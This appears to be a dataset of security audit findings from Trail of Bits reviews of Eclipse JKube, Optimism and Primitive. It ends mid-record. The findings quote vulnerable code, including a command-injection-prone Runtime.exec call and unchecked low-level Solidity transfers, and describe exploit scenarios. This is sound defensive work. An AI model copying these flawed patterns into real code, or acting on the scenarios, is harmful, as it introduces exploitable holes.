Recommendations Short term, improve the default generated configuration to enhance the security posture of applications deployed using JKube, while maintaining compatibility with most common scenarios. Apply automatic tools such as Checkov during development to review the configuration generated by JKube and identify areas for improvement. Long term, implement mechanisms in JKube to allow users to configure more advanced security features in a convenient way. References Appendix D: Docker Recommendations Appendix E: Hardening Containers Run via Kubernetes", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "2. Risk of command line injection from secret ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-eclipse-jkube-securityreview.pdf", + "body": "As part of the Spring Boot watcher functionality, JKube executes a second Java process. The command line for this process interpolates an arbitrary secret, making it unsafe. This command line is then tokenized by separating on spaces. If the secret contains spaces, this process could allow an attacker to add arbitrary arguments and command-line flags and modify the behavior of this command execution. StringBuilder buffer = new StringBuilder( \"java -cp \" ); (...) buffer.append( \" -Dspring.devtools.remote.secret=\" ); buffer.append( remoteSecret ); buffer.append( \" org.springframework.boot.devtools.RemoteSpringApplication \" ); buffer.append(url); try { String command = buffer.toString(); log.debug( \"Running: \" + command); final Process process = Runtime.getRuntime().exec(command) ; Figure 2.1: A secret is used without sanitization on a command string that is then executed. ( jkube/jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/springboot/watcher/SpringBootWatcher.java#136171 ) Exploit Scenario An attacker forks an open source project that uses JKube and Spring Boot, improves it in some useful way, and introduces a malicious spring.devtools.remote.secret secret in application.properties. A user then finds this forked project and sets it up locally. When the user runs mvn k8s:watch, JKube invokes a command that includes attacker-controlled content, compromising the user's machine. Recommendations Short term, rewrite the command-line building code to use an array of arguments instead of a single command-line string. Java provides several variants of the exec method, such as exec(String[]), which are safer to use when user-provided input is involved. Long term, integrate static analysis tools in the development process and CI/CD pipelines, such as Semgrep and CodeQL, to detect instances of similar problems early on. Review uses of user-controlled input to ensure they are sanitized if necessary and processed safely.
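The report's fix is Java's exec(String[]); as a language-neutral sketch of the same principle (illustrative names, not JKube code), here is the equivalent construction in Go, where the secret is a single argv element that is never re-tokenized:

package main

import (
    \"log\"
    \"os/exec\"
)

// runRemoteApp passes each argument as a discrete argv element; no shell or
// whitespace tokenization ever sees the secret, so it cannot inject extra
// arguments or flags. All names here are illustrative.
func runRemoteApp(classpath, remoteSecret, url string) error {
    cmd := exec.Command(
        \"java\",
        \"-cp\", classpath,
        \"-Dspring.devtools.remote.secret=\"+remoteSecret,
        \"org.springframework.boot.devtools.RemoteSpringApplication\",
        url,
    )
    log.Printf(\"running: %v\", cmd.Args)
    return cmd.Run()
}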
", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "1. Risk of misconfigured GasPriceOracle state variables that can lock L2 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-11-optimism-securityreview.pdf", + "body": "When bootstrapping the L2 network operated by op-geth, the GasPriceOracle contract is pre-deployed to L2, and its contract state variables are used to specify the L1 costs to be charged on L2. Three state variables are used to compute the costs (decimals, overhead, and scalar), which can be updated through transactions sent to the node. However, these state variables could be misconfigured in a way that sets gas prices high enough to prevent transactions from being processed. For example, if overhead were set to the maximum value of a 256-bit unsigned integer, subsequent transactions would not be accepted. In an end-to-end test of the above example, contract bindings used in op-e2e tests (such as the GasPriceOracle bindings used to update the state variables) were no longer able to make subsequent transactions/updates, as calls to SetOverhead or SetDecimals resulted in a deadlock. Sending a transaction directly through the RPC client did not produce a transaction receipt that could be fetched. Recommendations Short term, implement checks to ensure that GasPriceOracle parameters can be updated even if fee parameters were previously misconfigured. This could be achieved by adding an exception to GasPriceOracle fees when the contract owner calls methods within the contract or by setting a maximum fee cap. Long term, develop operational procedures to ensure the system is not deployed in or otherwise entered into an unexpected state as a result of operator actions.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Medium" + ] + }, + { + "title": "1. Transfer operations may silently fail due to the lack of contract existence checks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The pool fails to check that a contract exists before performing transfers. As a result, the pool may assume that failed transactions involving destroyed tokens or tokens that have not yet been deployed were successful. Transfers.safeTransfer, TransferHelper.safeTransfer, and TransferHelper.safeTransferFrom use low-level calls to perform transfers without confirming the contract's existence: ) internal { ( bool success , bytes memory returnData) = address (token).call( abi.encodeWithSelector(token.transfer.selector, to, value) ); require (success && (returnData.length == 0 || abi.decode(returnData, ( bool ))), \"Transfer fail\" ); } Figure 1.1: rmm-core/contracts/libraries/Transfers.sol#16-21 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed.
Figure 1.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the tokens to be transferred have not yet been deployed or have been destroyed, safeTransfer and safeTransferFrom will return success even though the transfer was not executed. Exploit Scenario The pool contains two tokens: A and B. The A token has a bug, and the contract is destroyed. Bob is not aware of the issue and swaps 1,000 B tokens for A tokens. Bob successfully transfers 1,000 B tokens to the pool but does not receive any A tokens in return. As a result, Bob loses 1,000 B tokens. Recommendations Short term, implement a contract existence check before the low-level calls in Transfer.safeTransfer, TransferHelper.safeTransfer, and TransferHelper.safeTransferFrom. This will ensure that a swap will revert if the token to be bought no longer exists, preventing the pool from accepting the token to be sold without returning any tokens in exchange. Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation, particularly the Warnings section, before implementing them to ensure that they are implemented correctly.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Although dependency scans did not indicate a direct threat to the project under review, yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "3. Anyone could steal pool tokens earned interest ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "If a PrimitiveEngine contract is deployed with certain ERC20 tokens, unexpected token interest behavior could allow token interest to count toward the number of tokens required for the deposit, allocate, create, and swap functions, allowing the user to avoid paying in full. Liquidity providers use the deposit function to increase the liquidity in a position. The following code within the function verifies that the pool has received at least the minimum number of tokens required by the protocol: if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); Figure 3.1: rmm-core/contracts/PrimitiveEngine.sol#213-217 Assume that both delRisky and delStable are positive. First, the code fetches the current balances of the tokens. Next, the depositCallback function is called to transfer the required number of each token to the pool contract. Finally, the code verifies that each token's balance has increased by at least the required amount.
There could be a token that allows token holders to earn interest simply because they are token holders. To retrieve this interest, token holders could call a certain function to calculate the interest earned and increase their balances. An attacker could call this function from within the depositCallback function to pay out interest to the pool contract. This would increase the pool's token balance, decreasing the number of tokens that the user needs to transfer to the pool contract to pass the balance check (i.e., the check confirming that the balance has sufficiently increased). In effect, the user's token payment obligation is reduced because the interest accounts for part of the required balance increase. To date, we have not identified a token contract that contains such functionality; however, it is possible that one exists or could be created. Exploit Scenario Bob deploys a PrimitiveEngine contract with token1 and token2. Token1 allows its holders to earn passive interest. Anyone can call get_interest(address) to make a certain token holder's interest be claimed and added to the token holder's balance. Over time, the pool can claim 1,000 tokens. Eve calls deposit, and the pool requires Eve to send 1,000 tokens. Eve calls get_interest(address) in the depositCallback function instead of sending the tokens, depositing to the pool without paying the minimum required tokens. Recommendations Short term, add documentation explaining to users that the use of interest-earning tokens can reduce the standard payments for deposit, allocate, create, and swap. Long term, using the Token Integration Checklist (appendix C), generate a document detailing the shortcomings of tokens with certain features and the impacts of their use in the Primitive protocol. That way, users will not be alarmed if the use of a token with nonstandard features leads to unexpected results.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "4. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Primitive contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Primitive contracts.
Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "5. Lack of zero-value checks on functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. function deposit( address recipient, uint256 delRisky, uint256 delStable, bytes calldata data ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins[recipient].deposit(delRisky, delStable); // state update uint256 balRisky; uint256 balStable; if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); } Figure 5.1: rmm-core/contracts/PrimitiveEngine.sol#L201-L219 Among others, the following functions lack zero-value checks on their arguments: PrimitiveEngine.deposit PrimitiveEngine.withdraw PrimitiveEngine.allocate PrimitiveEngine.swap PositionDescriptor.constructor MarginManager.deposit MarginManager.withdraw SwapManager.swap CashManager.unwrap CashManager.sweepToken Exploit Scenario Alice, a user, mistakenly provides the zero address as an argument when depositing for a recipient. As a result, her funds are saved in the margins of the zero address instead of a different address. Recommendations Short term, add zero-value checks for all function arguments to ensure that users cannot mistakenly set incorrect values, misconfiguring the system. Long term, use Slither, which will catch functions that do not have zero-value checks.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. uint256.percentage() and int256.percentage() are not inverses of each other ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Units library provides two percentage helper functions to convert unsigned integers to signed 64x64 fixed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts denormalized percentage integer to a fixed point 64.64 number /// @dev Convert unsigned 256-bit integer number into signed 64.64 fixed point number /// @param denorm Unsigned percentage integer with precision of 1e4 /// @return Signed 64.64 fixed point percentage with precision of 1e4 function percentage( uint256 denorm) internal pure returns ( int128 ) { return denorm. divu (PERCENTAGE); } /// @notice Converts signed 64.64 fixed point percentage to a denormalized percetage integer /// @param denorm Signed 64.64 fixed point percentage /// @return Unsigned percentage denormalized with precision of 1e4 function percentage( int128 denorm) internal pure returns ( uint256 ) { return denorm.
mulu (PERCENTAGE); } Figure 6.1: rmm-core/contracts/libraries/Units.sol#L53-L66 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu(), which both round downward toward zero. As a result, if a uint256 value is converted to a signed 64x64 fixed point and then converted back to a uint256 value, the result will not equal the original uint256 value: function scalePercentages (uint256 value ) public { require(value > Units.PERCENTAGE); int128 signedPercentage = value.percentage(); uint256 unsignedPercentage = signedPercentage.percentage(); if(unsignedPercentage != value) { emit AssertionFailed( \"scalePercentages\" , signedPercentage, unsignedPercentage); assert(false); } Figure 6.2: rmm-core/contracts/LibraryMathEchidna.sol#L48-L57 We used Echidna to detect this property violation: Analyzing contract: /rmm-core/contracts/LibraryMathEchidna.sol:LibraryMathEchidna scalePercentages(uint256): failed! Call sequence: scalePercentages(10006) Event sequence: Panic(1), AssertionFailed(\"scalePercentages\", 18457812120153777346, 10005) Figure 6.3: Echidna results Exploit Scenario 1. uint256.percentage(): 10006.percentage() = 1.0006, which divu stores with slight downward truncation. 2. int128.percentage(): converting back with mulu truncates again, yielding 10005. 3. The assertion fails because 10006 != 10005. Recommendations Short term, either remove the int128.percentage() function if it is unused in the system or ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.
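To see why two floor-rounding conversions cannot be inverses, here is a minimal Go sketch (not the Solidity library) that mirrors divu and mulu with 64.64 fixed-point arithmetic over big integers; it reproduces the 10006 -> 10005 loss from figure 6.3:

package main

import (
    \"fmt\"
    \"math/big\"
)

var (
    precision = big.NewInt(10000)                   // 1e4 percentage precision, as in the report
    scale     = new(big.Int).Lsh(big.NewInt(1), 64) // 64.64 fixed-point scale (2^64)
)

// toFixed mirrors ABDKMath64x64.divu: floor(denorm * 2^64 / 10000).
func toFixed(denorm *big.Int) *big.Int {
    return new(big.Int).Div(new(big.Int).Mul(denorm, scale), precision)
}

// fromFixed mirrors ABDKMath64x64.mulu: floor(fixed * 10000 / 2^64).
func fromFixed(fixed *big.Int) *big.Int {
    return new(big.Int).Div(new(big.Int).Mul(fixed, precision), scale)
}

func main() {
    in := big.NewInt(10006)
    out := fromFixed(toFixed(in))
    fmt.Println(in, out) // prints 10006 10005: both conversions floor, so the round trip loses value
}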
", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "7. Users can allocate tokens to a pool at the moment the pool reaches maturity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Users can allocate tokens to a pool at the moment the pool reaches maturity, which creates an opportunity for attackers to front-run or update the curve right before the maturity period ends. function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 7.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, document the expected behavior of transactions that allocate funds into a pool that has just reached maturity and analyze the front-running risk. Long term, analyze all front-running risks on all transactions in the system.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "8. Possible front-running vulnerability during BUFFER time ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The PrimitiveEngine.swap function permits swap transactions until 120 seconds after maturity, which could enable miners to front-run swap transactions and engage in malicious behavior. The constant tau value may allow miners to profit from front-running transactions when the swap curve is locked after maturity. SwapDetails memory details = SwapDetails({ recipient: recipient, poolId: poolId, deltaIn: deltaIn, deltaOut: deltaOut, riskyForStable: riskyForStable, fromMargin: fromMargin, toMargin: toMargin, timestamp: _blockTimestamp() }); uint32 lastTimestamp = _updateLastTimestamp(details.poolId); // updates lastTimestamp of `poolId` if (details.timestamp > lastTimestamp + BUFFER) revert PoolExpiredError(); // 120s buffer to allow final swaps Figure 8.1: rmm-core/contracts/PrimitiveEngine.sol#L314-L326 Recommendations Short term, perform an off-chain analysis on the curve and the swaps to determine the impact of a front-running attack on these transactions. Long term, perform an additional economic analysis with historical data on pools to determine the impact of front-running attacks on all functionality in the system.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Undetermined" + ] + }, + { + "title": "9. Inconsistency in allocate and remove functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The allocate and remove functions do not have the same interface, as one would expect. The allocate function allows users to set the recipient of the allocated liquidity and choose whether the funds will be taken from the margins or sent directly. The remove function unallocates the liquidity from the pool and sends the tokens to the msg.sender; with this function, users cannot set the recipient of the tokens or choose whether the tokens will be credited to their margins for future use or directly sent back to them.
function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 9.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, either document the design decision or add logic to the remove function allowing users to set the recipient and to choose whether the tokens should be credited to their margins. Long term, make sure to document design decisions and the rationale behind them, especially for behavior that may not be obvious.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "10. Areas of the codebase that are inconsistent with the documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Primitive codebase contains clear documentation and mathematical analysis denoting the intended behavior of the system. However, we identified certain areas in which the implementation does not match the white paper, including the following: Expected range for the gamma value of a pool. The white paper defines 10,000 as 100% in the smart contract; however, the contract checks that the provided gamma is between 9,000 (inclusive) and 10,000 (exclusive); if it is not within this range, the pool reverts with a GammaError. The white paper should be updated to reflect the behavior of the code in these areas. Recommendations Short term, review and properly document all areas of the codebase with this gamma range check. Long term, ensure that the formal specification matches the expected behavior of the protocol.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "11. Allocate and remove are not exact inverses of each other ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Due to the rounding logic used in the codebase, when users allocate funds into a system, they may not receive the same amount back when they remove them.
When funds are allocated into a system, the values are rounded down (through native truncation) when they are added to the reserves: /// @notice Add to both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to add to the reserve /// @param delStable Amount of stable tokens to add to the reserve /// @param delLiquidity Amount of liquidity created with the provided tokens /// @param blockTimestamp Timestamp used to update cumulative reserves function allocate ( Data storage reserve, uint256 delRisky , uint256 delStable , uint256 delLiquidity , uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky += delRisky.toUint128(); reserve.reserveStable += delStable.toUint128(); reserve.liquidity += delLiquidity.toUint128(); } Figure 11.1: rmm-core/contracts/libraries/Reserve.sol#L70-L87 When funds are removed from the reserves, they are similarly truncated: /// @notice Remove from both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to remove to the reserve /// @param delStable Amount of stable tokens to remove to the reserve /// @param delLiquidity Amount of liquidity removed from total supply /// @param blockTimestamp Timestamp used to update cumulative reserves function remove( Data storage reserve, uint256 delRisky, uint256 delStable, uint256 delLiquidity, uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky -= delRisky.toUint128(); reserve.reserveStable -= delStable.toUint128(); reserve.liquidity -= delLiquidity.toUint128(); } Figure 11.2: rmm-core/contracts/libraries/Reserve.sol#L89-L106 We used the following Echidna property to test this behavior: function check_allocate_remove_inverses( uint256 randomId, uint256 intendedLiquidity, bool fromMargin ) public { AllocateCall memory allocate; allocate.poolId = Addresses.retrieve_created_pool(randomId); retrieve_current_pool_data(allocate.poolId, true ); intendedLiquidity = E2E_Helper.one_to_max_uint64(intendedLiquidity); allocate.delRisky = (intendedLiquidity * precall.reserve.reserveRisky) / precall.reserve.liquidity; allocate.delStable = (intendedLiquidity * precall.reserve.reserveStable) / precall.reserve.liquidity; uint256 delLiquidity = allocate_helper(allocate); // these are calculated the amount returned when remove is called ( uint256 removeRisky, uint256 removeStable) = remove_should_succeed(allocate.poolId, delLiquidity); emit AllocateRemoveDifference(allocate.delRisky, removeRisky); emit AllocateRemoveDifference(allocate.delStable, removeStable); assert (allocate.delRisky == removeRisky); assert (allocate.delStable == removeStable); assert (intendedLiquidity == delLiquidity); } Figure 11.3: rmm-core/contracts/libraries/Reserve.sol#L89-L106 In considering this rounding logic, we used Echidna to find the most optimal allocate value for an amount of liquidity, which produced a difference of 1,920,041,647,503 between the amount allocated and the amount removed. check_allocate_remove_inverses(uint256,uint256,bool): failed!
Call sequence: create_new_pool_should_not_revert(113263940847354084267525170308314,0,12,58,414705177,2920703543387093873177049109445903794910061131205338981603716902339924517 4) from: 0x0000000000000000000000000000000000020000 Gas: 0xbebc20 check_allocate_remove_inverses(513288669432172152578276403318402760987129411133329015270396,675391606931488162786753316903883654910567233327356334685,false) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d Event sequence: Panic(1), Transfer(6361150874), Transfer(64302260917206574294870), AllocateMarginBalance(0, 0, 6361150874, 64302260917206574294870), Transfer(6361150874), Transfer(64302260917206574294870), Allocate(6361150874, 64302260917206574294870), Remove(6361150873, 64302260915286532647367), AllocateRemoveDifference(6361150874, 6361150873), AllocateRemoveDifference(64302260917206574294870, 64302260915286532647367) Figure 11.4: Echidna results Exploit Scenario Alice, a Primitive user, determines a specific amount of liquidity that she wants to put into the system. She calculates the required risky and stable tokens to make the trade and then allocates the funds to the pool. Due to the rounding direction in the allocate operation and the pool, she receives less than she expected after removing her liquidity. Recommendations Short term, perform additional analysis to determine a safe delta value to allow the allocate and remove operations to happen. Document this issue for end users to ensure that they are aware of the rounding behavior. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "12. scaleToX64() and scalefromX64() are not inverses of each other ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Units library provides the scaleToX64() and scalefromX64() helper functions to convert unsigned integers to signed 64x64 fixed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts unsigned 256-bit wei value into a fixed point 64.64 number /// @param value Unsigned 256-bit wei amount, in native precision /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Signed 64.64 fixed point number scaled from native precision function scaleToX64 ( uint256 value , uint256 factor ) internal pure returns ( int128 y ) { uint256 scaleFactor = PRECISION / factor; y = value.divu(scaleFactor); } Figure 12.1: rmm-core/contracts/libraries/Units.sol#L35-L42 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu(), which both round downward toward zero.
As a result, if a uint256 value is converted to a signed 64x64 fixed point and then converted back to a uint256 value, the result will not equal the original uint256 value: /// @notice Converts signed fixed point 64.64 number into unsigned 256-bit wei value /// @param value Signed fixed point 64.64 number to convert from precision of 10^18 /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Unsigned 256-bit wei amount scaled to native precision of 10^(18 - factor) function scalefromX64 ( int128 value , uint256 factor ) internal pure returns ( uint256 y ) { uint256 scaleFactor = PRECISION / factor; y = value.mulu(scaleFactor); } Figure 12.2: rmm-core/contracts/libraries/Units.sol#L44-L51 We used the following Echidna property to test this behavior: function scaleToAndFromX64Inverses (uint256 value , uint256 _decimals ) public { // will enforce factor between 0 - 12 uint256 factor = _decimals % ( 13 ); // will enforce scaledFactor between 1 - 10**12 , because 10**0 = 1 uint256 scaledFactor = 10 **factor; int128 scaledUpValue = value.scaleToX64(scaledFactor); uint256 scaledDownValue = scaledUpValue.scalefromX64(scaledFactor); assert(scaledDownValue == value); } Figure 12.3: contracts/crytic/LibraryMathEchidna.sol scaleToAndFromX64Inverses(uint256,uint256): failed! Call sequence: scaleToAndFromX64Inverses(1,0) Event sequence: Panic(1) Figure 12.4: Echidna results Recommendations Short term, ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "13. getCDF always returns output in the range of (0, 1) ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "CumulativeNormalDistribution provides the getCDF function to calculate an approximation of the cumulative distribution function, whose output should lie in the open interval (0, 1); however, the getCDF function can return exactly 1. /// @notice Uses Abramowitz and Stegun approximation: /// https://en.wikipedia.org/wiki/Abramowitz_and_Stegun /// @dev Maximum error: 3.15x10-3 /// @return Standard Normal Cumulative Distribution Function of `x` function getCDF( int128 x) internal pure returns ( int128 ) { int128 z = x.div(CDF3); int128 t = ONE_INT.div(ONE_INT.add(CDF0.mul(z.abs()))); int128 erf = getErrorFunction(z, t); if (z < 0 ) { erf = erf.neg(); } int128 result = (HALF_INT).mul(ONE_INT.add(erf)); return result; } Figure 13.1: rmm-core/contracts/libraries/CumulativeNormalDistribution.sol#L24-L37 We used the following Echidna property to test this behavior: function CDFCheckRange( uint128 x, uint128 neg) public { int128 x_x = realisticCDFInput(x, neg); int128 res = x_x.getCDF(); emit P(x_x, res, res.toInt()); assert (res > 0 && res.toInt() < 1 ); } Figure 13.2: rmm-core/contracts/LibraryMathEchidna.sol CDFCheckRange(uint128,uint128): failed! Call sequence: CDFCheckRange(168951622815827493037,1486973755574663235619590266651) Event sequence: Panic(1), P(168951622815827493037, 18446744073709551616, 1) Figure 13.3: Echidna results Recommendations Short term, perform additional analysis to determine whether this behavior is an issue for the system. Long term, use Echidna to test system and mathematical invariants.
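For reference, the exact standard normal CDF satisfies the identity below (in the quoted code, CDF3 appears to play the role of sqrt(2), an assumption based on the z = x.div(CDF3) step); since erf maps every finite input into (-1, 1), the true CDF never reaches 1, and the value of 1 observed by Echidna is an artifact of the approximation's bounded precision (maximum error 3.15 x 10^-3) combined with fixed-point truncation:

\Phi(x) = \frac{1}{2}\left(1 + \operatorname{erf}\left(\frac{x}{\sqrt{2}}\right)\right), \qquad \operatorname{erf}(z) \in (-1, 1) \ \text{for finite } z \ \Longrightarrow\ \Phi(x) \in (0, 1).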
", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "14. Lack of data validation on withdrawal operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The withdraw function allows users to specify the recipient to send funds to. Due to a lack of data validation, the address of the engine could be set as the recipient. As a result, the tokens will be transferred directly to the engine itself. /// @inheritdoc IPrimitiveEngineActions function withdraw ( address recipient , uint256 delRisky , uint256 delStable ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins.withdraw(delRisky, delStable); // state update if (delRisky != 0 ) IERC20(risky).safeTransfer(recipient, delRisky); if (delStable != 0 ) IERC20(stable).safeTransfer(recipient, delStable); emit Withdraw( msg.sender , recipient, delRisky, delStable); } Figure 14.1: rmm-core/contracts/PrimitiveEngine.sol#L221-L232 We used the following Echidna property to test this behavior: function withdraw_with_only_non_zero_addr( address recipient, uint256 delRisky, uint256 delStable ) public { require (recipient != address ( 0 )); //ensures that delRisky and delStable are at least 1 and not too large to overflow the deposit delRisky = E2E_Helper.one_to_max_uint64(delRisky); delStable = E2E_Helper.one_to_max_uint64(delStable); MarginHelper memory senderMargins = populate_margin_helper( address ( this )); if (senderMargins.marginRisky < delRisky || senderMargins.marginStable < delStable) { withdraw_should_revert(recipient, delRisky, delStable); } else { withdraw_should_succeed(recipient, delRisky, delStable); } } function withdraw_should_succeed ( address recipient , uint256 delRisky , uint256 delStable ) internal { MarginHelper memory precallSender = populate_margin_helper( address ( this )); MarginHelper memory precallRecipient = populate_margin_helper(recipient); uint256 balanceRecipientRiskyBefore = risky.balanceOf(recipient); uint256 balanceRecipientStableBefore = stable.balanceOf(recipient); uint256 